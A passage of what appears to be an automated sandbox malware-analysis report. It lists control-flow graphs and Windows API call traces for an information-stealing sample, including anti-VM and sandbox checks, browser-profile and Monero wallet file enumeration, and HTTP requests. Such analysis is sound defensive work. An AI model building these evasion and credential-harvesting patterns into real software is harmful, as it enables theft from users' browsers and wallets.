f1a740 * 2 call f01590 call f152c0 call f1a8a0 call f1a800 call f1aad0 StrCmpCA 1168->1175 1176 f1587b-f158ce call f1a820 call f1a7a0 call f01590 call f151f0 call f1a8a0 call f1a800 1168->1176 1198 f15a16-f15a21 Sleep 1169->1198 1199 f15a28-f15a91 call f1a8a0 call f1a820 * 2 call f01670 call f1a800 * 4 call f16560 call f01550 1169->1199 1175->1169 1274 f1594a-f1598a call f1a7a0 call f01590 call f151f0 call f1a8a0 call f1a800 1175->1274 1176->1169 1198->1106 1199->1269 1245->1142 1274->1169
                        APIs
                          • Part of subcall function 00F1A820: lstrlen.KERNEL32(00F04F05,?,?,00F04F05,00F20DDE), ref: 00F1A82B
                          • Part of subcall function 00F1A820: lstrcpy.KERNEL32(00F20DDE,00000000), ref: 00F1A885
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00F15644
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00F156A1
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00F15857
                          • Part of subcall function 00F1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F1A7E6
                          • Part of subcall function 00F151F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00F15228
                          • Part of subcall function 00F1A8A0: lstrcpy.KERNEL32(?,00F20E17), ref: 00F1A905
                          • Part of subcall function 00F152C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00F15318
                          • Part of subcall function 00F152C0: lstrlen.KERNEL32(00000000), ref: 00F1532F
                          • Part of subcall function 00F152C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00F15364
                          • Part of subcall function 00F152C0: lstrlen.KERNEL32(00000000), ref: 00F15383
                          • Part of subcall function 00F152C0: lstrlen.KERNEL32(00000000), ref: 00F153AE
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00F1578B
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00F15940
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00F15A0C
                        • Sleep.KERNEL32(0000EA60), ref: 00F15A1B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen$Sleep
                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                        • API String ID: 507064821-2791005934
                        • Opcode ID: 0a15205f3650107598d7f6f3933d81f9bb9fac2180217eae4b7afa904f10fddb
                        • Instruction ID: c3c62e42bbe7a9f735ae820c59eb25543e76186791cc0ef00e3f6855e499408d
                        • Opcode Fuzzy Hash: 0a15205f3650107598d7f6f3933d81f9bb9fac2180217eae4b7afa904f10fddb
                        • Instruction Fuzzy Hash: ACE145769111049BCB18FBA0ED52EFD7338AF54720F408128B517570D5EF38AB8AEB92

                        Control-flow Graph

                        control_flow_graph 1301 f117a0-f117cd call f1aad0 StrCmpCA 1304 f117d7-f117f1 call f1aad0 1301->1304 1305 f117cf-f117d1 ExitProcess 1301->1305 1309 f117f4-f117f8 1304->1309 1310 f119c2-f119cd call f1a800 1309->1310 1311 f117fe-f11811 1309->1311 1313 f11817-f1181a 1311->1313 1314 f1199e-f119bd 1311->1314 1316 f118f1-f11902 StrCmpCA 1313->1316 1317 f11951-f11962 StrCmpCA 1313->1317 1318 f11970-f11981 StrCmpCA 1313->1318 1319 f11913-f11924 StrCmpCA 1313->1319 1320 f11932-f11943 StrCmpCA 1313->1320 1321 f11835-f11844 call f1a820 1313->1321 1322 f1185d-f1186e StrCmpCA 1313->1322 1323 f1187f-f11890 StrCmpCA 1313->1323 1324 f11821-f11830 call f1a820 1313->1324 1325 f11849-f11858 call f1a820 1313->1325 1326 f118ad-f118be StrCmpCA 1313->1326 1327 f118cf-f118e0 StrCmpCA 1313->1327 1328 f1198f-f11999 call f1a820 1313->1328 1314->1309 1338 f11904-f11907 1316->1338 1339 f1190e 1316->1339 1344 f11964-f11967 1317->1344 1345 f1196e 1317->1345 1347 f11983-f11986 1318->1347 1348 f1198d 1318->1348 1340 f11930 1319->1340 1341 f11926-f11929 1319->1341 1342 f11945-f11948 1320->1342 1343 f1194f 1320->1343 1321->1314 1330 f11870-f11873 1322->1330 1331 f1187a 1322->1331 1332 f11892-f1189c 1323->1332 1333 f1189e-f118a1 1323->1333 1324->1314 1325->1314 1334 f118c0-f118c3 1326->1334 1335 f118ca 1326->1335 1336 f118e2-f118e5 1327->1336 1337 f118ec 1327->1337 1328->1314 1330->1331 1331->1314 1353 f118a8 1332->1353 1333->1353 1334->1335 1335->1314 1336->1337 1337->1314 1338->1339 1339->1314 1340->1314 1341->1340 1342->1343 1343->1314 1344->1345 1345->1314 1347->1348 1348->1314 1353->1314
                        APIs
                        • StrCmpCA.SHLWAPI(00000000,block), ref: 00F117C5
                        • ExitProcess.KERNEL32 ref: 00F117D1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        • Associated: 00000000.00000002.2091239464.0000000000F00000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FBD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.0000000000FE2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091263076.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.000000000115E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013B1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091443087.00000000013E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091685201.00000000013EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091795318.0000000001579000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091809845.000000000157A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess
                        • String ID: block
                        • API String ID: 621844428-2199623458
                        • Opcode ID: 7f6a6cabf7c258eaffa67b5d1fbbe7d701c9b6ca3031198a3c13f65ae7bb7f5e
                        • Instruction ID: 91bf6e679751f9cf91501c76887a2e9a150de4423e41b1d70038a94d9b1b57ef
                        • Opcode Fuzzy Hash: 7f6a6cabf7c258eaffa67b5d1fbbe7d701c9b6ca3031198a3c13f65ae7bb7f5e
                        • Instruction Fuzzy Hash: 10518EB5A00209EFDB04DFA0E964BFE77B5FF44700F508058E526A7240DB74E981EB62

                        Control-flow Graph

                        control_flow_graph 1356 f17500-f1754a GetWindowsDirectoryA 1357 f17553-f175c7 GetVolumeInformationA call f18d00 * 3 1356->1357 1358 f1754c 1356->1358 1365 f175d8-f175df 1357->1365 1358->1357 1366 f175e1-f175fa call f18d00 1365->1366 1367 f175fc-f17617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1368 f17619-f17626 call f1a740 1367->1368 1369 f17628-f17658 wsprintfA call f1a740 1367->1369 1377 f1767e-f1768e 1368->1377 1369->1377
                        APIs
                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00F17542
                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F1757F
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F17603
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00F1760A
                        • wsprintfA.USER32 ref: 00F17640
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                        • String ID: :$C$\
                        • API String ID: 1544550907-3809124531
                        • Opcode ID: 4868b3d3f938ace312d163163fd3437aac52f44618b1ef7f2e19392a92359907
                        • Instruction ID: 25100e7074a4dbbf9e3167006d84242645b4bca9cdb35ef9a59bb1edc64d94e8
                        • Opcode Fuzzy Hash: 4868b3d3f938ace312d163163fd3437aac52f44618b1ef7f2e19392a92359907
                        • Instruction Fuzzy Hash: 1141B1B5D44348ABDB24DF94DC45BEEBBB8EF18710F100098F50967280DB79AB84DBA5

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00F19860: GetProcAddress.KERNEL32(75900000,008A14E0), ref: 00F198A1
                          • Part of subcall function 00F19860: GetProcAddress.KERNEL32(75900000,008A16D8), ref: 00F198BA
                          • Part of subcall function 00F19860: GetProcAddress.KERNEL32(75900000,008A16F0), ref: 00F198D2
                          • Part of subcall function 00F19860: GetProcAddress.KERNEL32(75900000,008A1708), ref: 00F198EA
                          • Part of subcall function 00F19860: GetProcAddress.KERNEL32(75900000,008A1558), ref: 00F19903
                          • Part of subcall function 00F19860: GetProcAddress.KERNEL32(75900000,008A97F0), ref: 00F1991B
                          • Part of subcall function 00F19860: GetProcAddress.KERNEL32(75900000,00896900), ref: 00F19933
                          • Part of subcall function 00F19860: GetProcAddress.KERNEL32(75900000,00896740), ref: 00F1994C
                          • Part of subcall function 00F19860: GetProcAddress.KERNEL32(75900000,008A1720), ref: 00F19964
                          • Part of subcall function 00F19860: GetProcAddress.KERNEL32(75900000,008A1738), ref: 00F1997C
                          • Part of subcall function 00F19860: GetProcAddress.KERNEL32(75900000,008A1780), ref: 00F19995
                          • Part of subcall function 00F19860: GetProcAddress.KERNEL32(75900000,008A1798), ref: 00F199AD
                          • Part of subcall function 00F19860: GetProcAddress.KERNEL32(75900000,00896700), ref: 00F199C5
                          • Part of subcall function 00F19860: GetProcAddress.KERNEL32(75900000,008A17B0), ref: 00F199DE
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                          • Part of subcall function 00F011D0: ExitProcess.KERNEL32 ref: 00F01211
                          • Part of subcall function 00F01160: GetSystemInfo.KERNEL32(?), ref: 00F0116A
                          • Part of subcall function 00F01160: ExitProcess.KERNEL32 ref: 00F0117E
                          • Part of subcall function 00F01110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00F0112B
                          • Part of subcall function 00F01110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00F01132
                          • Part of subcall function 00F01110: ExitProcess.KERNEL32 ref: 00F01143
                          • Part of subcall function 00F01220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00F0123E
                          • Part of subcall function 00F01220: ExitProcess.KERNEL32 ref: 00F01294
                          • Part of subcall function 00F16770: GetUserDefaultLangID.KERNEL32 ref: 00F16774
                          • Part of subcall function 00F01190: ExitProcess.KERNEL32 ref: 00F011C6
                          • Part of subcall function 00F17850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00F011B7), ref: 00F17880
                          • Part of subcall function 00F17850: RtlAllocateHeap.NTDLL(00000000), ref: 00F17887
                          • Part of subcall function 00F17850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00F1789F
                          • Part of subcall function 00F178E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F17910
                          • Part of subcall function 00F178E0: RtlAllocateHeap.NTDLL(00000000), ref: 00F17917
                          • Part of subcall function 00F178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00F1792F
                          • Part of subcall function 00F1A9B0: lstrlen.KERNEL32(?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F1A9C5
                          • Part of subcall function 00F1A9B0: lstrcpy.KERNEL32(00000000), ref: 00F1AA04
                          • Part of subcall function 00F1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F1AA12
                          • Part of subcall function 00F1A8A0: lstrcpy.KERNEL32(?,00F20E17), ref: 00F1A905
                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,008A9830,?,00F2110C,?,00000000,?,00F21110,?,00000000,00F20AEF), ref: 00F16ACA
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00F16AE8
                        • CloseHandle.KERNEL32(00000000), ref: 00F16AF9
                        • Sleep.KERNEL32(00001770), ref: 00F16B04
                        • CloseHandle.KERNEL32(?,00000000,?,008A9830,?,00F2110C,?,00000000,?,00F21110,?,00000000,00F20AEF), ref: 00F16B1A
                        • ExitProcess.KERNEL32 ref: 00F16B22
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                        • String ID:
                        • API String ID: 2931873225-0
                        • Opcode ID: 7360e7f6d6e2321f725d2c5c11ccd3ee6e7f74f234eec841ea9209dca22a5134
                        • Instruction ID: add0297a09e081f325b06b2c9059c3b8c94ccad3646c79a2b32f7cc5bfc57e53
                        • Opcode Fuzzy Hash: 7360e7f6d6e2321f725d2c5c11ccd3ee6e7f74f234eec841ea9209dca22a5134
                        • Instruction Fuzzy Hash: 9C312D71941208ABDB18F7F0DC56BEE7738AF44750F504528F212A21C2DF796985E7A2

                        Control-flow Graph (image not reproduced; basic blocks and edges recovered from the graph data)

                        • 1436: f16af3 -> 1437
                        • 1437: f16b0a -> 1439, 1440
                        • 1439: f16aba-f16ad7 call f1aad0, OpenEventA -> 1446, 1447
                        • 1440: f16b0c-f16b22 call f16920, call f15b10, CloseHandle ExitProcess
                        • 1446: f16af5-f16b04 CloseHandle Sleep -> 1437
                        • 1447: f16ad9-f16af1 call f1aad0, CreateEventA -> 1440
                        APIs
                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,008A9830,?,00F2110C,?,00000000,?,00F21110,?,00000000,00F20AEF), ref: 00F16ACA
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00F16AE8
                        • CloseHandle.KERNEL32(00000000), ref: 00F16AF9
                        • Sleep.KERNEL32(00001770), ref: 00F16B04
                        • CloseHandle.KERNEL32(?,00000000,?,008A9830,?,00F2110C,?,00000000,?,00F21110,?,00000000,00F20AEF), ref: 00F16B1A
                        • ExitProcess.KERNEL32 ref: 00F16B22
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                        • String ID:
                        • API String ID: 941982115-0
                        • Opcode ID: 0f8f7e4e3cbf337888b888c9021946b38d761d5566bd7ce9b8b82241ec07bae2
                        • Instruction ID: eae0dd6626b61cd259ef6587a46d4cac9b579b612299f9753a622ed9dfe98539
                        • Opcode Fuzzy Hash: 0f8f7e4e3cbf337888b888c9021946b38d761d5566bd7ce9b8b82241ec07bae2
                        • Instruction Fuzzy Hash: 87F03A34A84209EBE724EBA0AC16BFD7B34EF44B42F104524B523E2181CBB955C0E655

                        Control-flow Graph

                        APIs
                        • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00F04839
                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 00F04849
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CrackInternetlstrlen
                        • String ID: <
                        • API String ID: 1274457161-4251816714
                        • Opcode ID: 05f540f54887a3b45cc34f7c039a1e4586823449d6d03d678a684d0bc4845f5a
                        • Instruction ID: 08624c374fb445a729d5b82e9f78c9f17dfb3adab4a21a313e02917e2a2d14eb
                        • Opcode Fuzzy Hash: 05f540f54887a3b45cc34f7c039a1e4586823449d6d03d678a684d0bc4845f5a
                        • Instruction Fuzzy Hash: A4215EB1D00208ABDF14DFA4EC45ADD7B78FF04320F108225F925A72C0DB746A0ADB91

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00F1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F1A7E6
                          • Part of subcall function 00F06280: InternetOpenA.WININET(00F20DFE,00000001,00000000,00000000,00000000), ref: 00F062E1
                          • Part of subcall function 00F06280: StrCmpCA.SHLWAPI(?,008AF278), ref: 00F06303
                          • Part of subcall function 00F06280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00F06335
                          • Part of subcall function 00F06280: HttpOpenRequestA.WININET(00000000,GET,?,008AE690,00000000,00000000,00400100,00000000), ref: 00F06385
                          • Part of subcall function 00F06280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00F063BF
                          • Part of subcall function 00F06280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F063D1
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00F15228
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                        • String ID: ERROR$ERROR
                        • API String ID: 3287882509-2579291623
                        • Opcode ID: 704c1eed7d13c92abb4adfc34005fd518e032b8e0c1ba0ceb12e294733455a4c
                        • Instruction ID: a762908a9a0adfb7c53f446844bffd56b30600bc45afb4874c6dc0ba642af2ed
                        • Opcode Fuzzy Hash: 704c1eed7d13c92abb4adfc34005fd518e032b8e0c1ba0ceb12e294733455a4c
                        • Instruction Fuzzy Hash: B1113031901048EBCB14FF60DD52AED7338AF50310F404158F81A4B1D2EF39AB96E692

                        Control-flow Graph (image not reproduced; basic blocks and edges recovered from the graph data)

                        • 1493: f01220-f01247 call f189b0, GlobalMemoryStatusEx -> 1496, 1497
                        • 1496: f01273-f0127a -> 1499
                        • 1497: f01249-f01271 call f1da00 (x2) -> 1499
                        • 1499: f01281-f01285 -> 1501, 1502
                        • 1501: f01287 -> 1504, 1505
                        • 1502: f0129a-f0129d
                        • 1504: f01292-f01294 ExitProcess
                        • 1505: f01289-f01290 -> 1502, 1504
                        APIs
                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00F0123E
                        • ExitProcess.KERNEL32 ref: 00F01294
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitGlobalMemoryProcessStatus
                        • String ID: @
                        • API String ID: 803317263-2766056989
                        • Opcode ID: b3e07cf0ac6e9b9d3e4d5d36083b8accf5b7aa57e3e9f90982b122e614f4a9d6
                        • Instruction ID: d2361d2b0f36ae46bfb56a5dbf8d79bd097a7ad51383d100f67b3b964cec0921
                        • Opcode Fuzzy Hash: b3e07cf0ac6e9b9d3e4d5d36083b8accf5b7aa57e3e9f90982b122e614f4a9d6
                        • Instruction Fuzzy Hash: 9501FBB0D84308BBEB20DBE4DC49B9EBB78BF14B05F208058E705B72C1D6795585A799
                        APIs
                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00F0112B
                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 00F01132
                        • ExitProcess.KERNEL32 ref: 00F01143
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$AllocCurrentExitNumaVirtual
                        • String ID:
                        • API String ID: 1103761159-0
                        • Opcode ID: 018a92a2d4916199c612867363ea9a8938a001d71111c99616ce2031866ef40f
                        • Instruction ID: da24382900eec6adb7f8d78b1fb4436dfe22ff50c1512d21bded57fe74ea21b9
                        • Opcode Fuzzy Hash: 018a92a2d4916199c612867363ea9a8938a001d71111c99616ce2031866ef40f
                        • Instruction Fuzzy Hash: 90E0E674985308FBF724ABA0AC1AB09767CEF04F16F504154F70A771C4D6B52641A799
                        APIs
                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00F010B3
                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00F010F7
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f00000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Virtual$AllocFree
                        • String ID:
                        • API String ID: 2087232378-0
                        • Opcode ID: 722e1dbea44e363dad2f52642c20e3a1b3e98762bbbd08a7ffaecc3c72b1ce05
                        • Instruction ID: 88bc1e0c12ee12ec50c669b909d443bf00a50cdcde140aa18e2658f45b7cdf3c
                        • Opcode Fuzzy Hash: 722e1dbea44e363dad2f52642c20e3a1b3e98762bbbd08a7ffaecc3c72b1ce05
                        • Instruction Fuzzy Hash: A1F0E971A81208BBE71497A4AC59FAAB7D8E705B25F300458F545E3280D5715E40EB50
                        APIs
                          • Part of subcall function 00F178E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F17910
                          • Part of subcall function 00F178E0: RtlAllocateHeap.NTDLL(00000000), ref: 00F17917
                          • Part of subcall function 00F178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00F1792F
                          • Part of subcall function 00F17850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00F011B7), ref: 00F17880
                          • Part of subcall function 00F17850: RtlAllocateHeap.NTDLL(00000000), ref: 00F17887
                          • Part of subcall function 00F17850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00F1789F
                        • ExitProcess.KERNEL32 ref: 00F011C6
                        Yara matches
                        Similarity
                        • API ID: Heap$Process$AllocateName$ComputerExitUser
                        • String ID:
                        • API String ID: 3550813701-0
                        • Opcode ID: 6cd76f307c8feb7a460db587f005320d3ac3366c3814cd8b5abc6c10fb26706c
                        • Instruction ID: 3e1b368f43cdfe3de053a21520cfbdadbc7d0205d0e99aa0bc06c1bb5b6614e3
                        • Opcode Fuzzy Hash: 6cd76f307c8feb7a460db587f005320d3ac3366c3814cd8b5abc6c10fb26706c
                        • Instruction Fuzzy Hash: A8E012B9D9430163DA2873B0BD0AB6A329C6F14796F140434FA0ED3142FE2DF881B6A5
                        APIs
                        • wsprintfA.USER32 ref: 00F138CC
                        • FindFirstFileA.KERNEL32(?,?), ref: 00F138E3
                        • lstrcat.KERNEL32(?,?), ref: 00F13935
                        • StrCmpCA.SHLWAPI(?,00F20F70), ref: 00F13947
                        • StrCmpCA.SHLWAPI(?,00F20F74), ref: 00F1395D
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00F13C67
                        • FindClose.KERNEL32(000000FF), ref: 00F13C7C
                        Strings
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                        • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                        • API String ID: 1125553467-2524465048
                        • Opcode ID: 759289e7f8c255034cd2ad17f28347396dcb7f9cc41a2bbbb97019abeeb56b14
                        • Instruction ID: 75ee75adae084e0edeec270080c132f04ec0fa3118f395e0e84b8bcb873ded97
                        • Opcode Fuzzy Hash: 759289e7f8c255034cd2ad17f28347396dcb7f9cc41a2bbbb97019abeeb56b14
                        • Instruction Fuzzy Hash: 72A190B6A402189BDB34DBA4DC84FEA7378FF44700F044598B61E96185EB749BC4DFA2
                        APIs
                          • Part of subcall function 00F1A740: lstrcpy.KERNEL32(00F20E17,00000000), ref: 00F1A788
                          • Part of subcall function 00F1A920: lstrcpy.KERNEL32(00000000,?), ref: 00F1A972
                          • Part of subcall function 00F1A920: lstrcat.KERNEL32(00000000), ref: 00F1A982
                          • Part of subcall function 00F1A9B0: lstrlen.KERNEL32(?,008A9B00,?,\Monero\wallet.keys,00F20E17), ref: 00F1A9C5
                          • Part of subcall function 00F1A9B0: lstrcpy.KERNEL32(00000000), ref: 00F1AA04
                          • Part of subcall function 00F1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F1AA12
                          • Part of subcall function 00F1A8A0: lstrcpy.KERNEL32(?,00F20E17), ref: 00F1A905
                        • FindFirstFileA.KERNEL32(00000000,?,00F20B32,00F20B2B,00000000,?,?,?,00F213F4,00F20B2A), ref: 00F0BEF5
                        • StrCmpCA.SHLWAPI(?,00F213F8), ref: 00F0BF4D
                        • StrCmpCA.SHLWAPI(?,00F213FC), ref: 00F0BF63
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00F0C7BF
                        • FindClose.KERNEL32(000000FF), ref: 00F0C7D1
                        Strings
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                        • API String ID: 3334442632-726946144
                        • Opcode ID: 73c34c400330681621c73d713f676f10c555cdd01493660870c96eee6cc0dd5f
                        • Instruction ID: 80456f60d5d20b5472f2a7cd69fbc23543b2caa4c5bc3a447bcf6a1fa33818d3
                        • Opcode Fuzzy Hash: 73c34c400330681621c73d713f676f10c555cdd01493660870c96eee6cc0dd5f
                        • Instruction Fuzzy Hash: 234253729111089BDB14FB70DD96EED737DAF94310F404568B90A970C1EF389B8AEB92
                        APIs
                        • wsprintfA.USER32 ref: 00F1492C
                        • FindFirstFileA.KERNEL32(?,?), ref: 00F14943
                        • StrCmpCA.SHLWAPI(?,00F20FDC), ref: 00F14971
                        • StrCmpCA.SHLWAPI(?,00F20FE0), ref: 00F14987
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00F14B7D
                        • FindClose.KERNEL32(000000FF), ref: 00F14B92
                        Strings
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\%s$%s\%s$%s\*
                        • API String ID: 180737720-445461498
                        • Opcode ID: ed9bbeed5c9a0dca5a87ec2e94e5e89a980f24fb6cc984b7eb8b9c8e037e6cab
                        • Instruction ID: 508ae36eb456311dd283dc08cf52a25fe26cea529061427cfe904d9f08642a96
                        • Opcode Fuzzy Hash: ed9bbeed5c9a0dca5a87ec2e94e5e89a980f24fb6cc984b7eb8b9c8e037e6cab
                        • Instruction Fuzzy Hash: D76197B6940218ABDB34EBA0EC45EEA737CFF88701F404598B50A96045EB35EBC5DF91
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00F14580
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00F14587
                        • wsprintfA.USER32 ref: 00F145A6
